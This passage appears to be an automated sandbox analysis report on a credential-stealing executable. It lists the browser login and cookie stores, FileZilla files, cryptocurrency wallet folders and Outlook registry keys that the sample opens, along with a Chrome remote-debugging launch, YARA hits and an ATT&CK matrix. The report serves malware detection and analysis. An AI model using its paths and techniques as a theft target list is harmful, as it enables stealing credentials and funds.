              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
              Source: Yara matchFile source: Process Memory Space: 0vsAIy0DhJ.exe PID: 2004, type: MEMORYSTR

              Remote Access Functionality

              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
              Source: Yara match | File source: 00000000.00000002.2003720246.0000000000511000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.1678322710.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2005346128.000000000102E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: 0vsAIy0DhJ.exe PID: 2004, type: MEMORYSTR
              Source: Yara match | File source: dump.pcap, type: PCAP
              Source: Yara match | File source: Process Memory Space: 0vsAIy0DhJ.exe PID: 2004, type: MEMORYSTR
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: 0_2_6C670C40 sqlite3_bind_zeroblob,0_2_6C670C40
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: 0_2_6C670D60 sqlite3_bind_parameter_name,0_2_6C670D60
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: 0_2_6C598EA0 sqlite3_clear_bindings,0_2_6C598EA0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: 0_2_6C670B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,0_2_6C670B40
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: 0_2_6C596410 bind,WSAGetLastError,0_2_6C596410
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: 0_2_6C59C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,0_2_6C59C050
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: 0_2_6C596070 PR_Listen,0_2_6C596070
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: 0_2_6C59C030 sqlite3_bind_parameter_count,0_2_6C59C030
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: 0_2_6C5960B0 listen,WSAGetLastError,0_2_6C5960B0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: 0_2_6C5222D0 sqlite3_bind_blob,0_2_6C5222D0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: 0_2_6C5963C0 PR_Bind,0_2_6C5963C0

              MITRE ATT&CK Matrix (techniques listed per tactic column; a number in parentheses is the count of matching signatures in this report, cells without a number are the matrix's unmatched template entries)

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
              Execution: Command and Scripting Interpreter (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
              Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
              Privilege Escalation: Process Injection (2); DLL Side-Loading (1); Extra Window Memory Injection (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
              Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (23); Disable or Modify Tools (1); Process Injection (2); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1); Extra Window Memory Injection (1)
              Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
              Discovery: System Time Discovery (1); Security Software Discovery (641); Virtualization/Sandbox Evasion (23); Process Discovery (2); File and Directory Discovery (1); System Information Discovery (236); Remote System Discovery; System Owner/User Discovery; Network Sniffing
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
              Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (4); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
              Command and Control: Encrypted Channel (21); Remote Access Software (1); Ingress Tool Transfer (12); Non-Application Layer Protocol (3); Application Layer Protocol (114); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement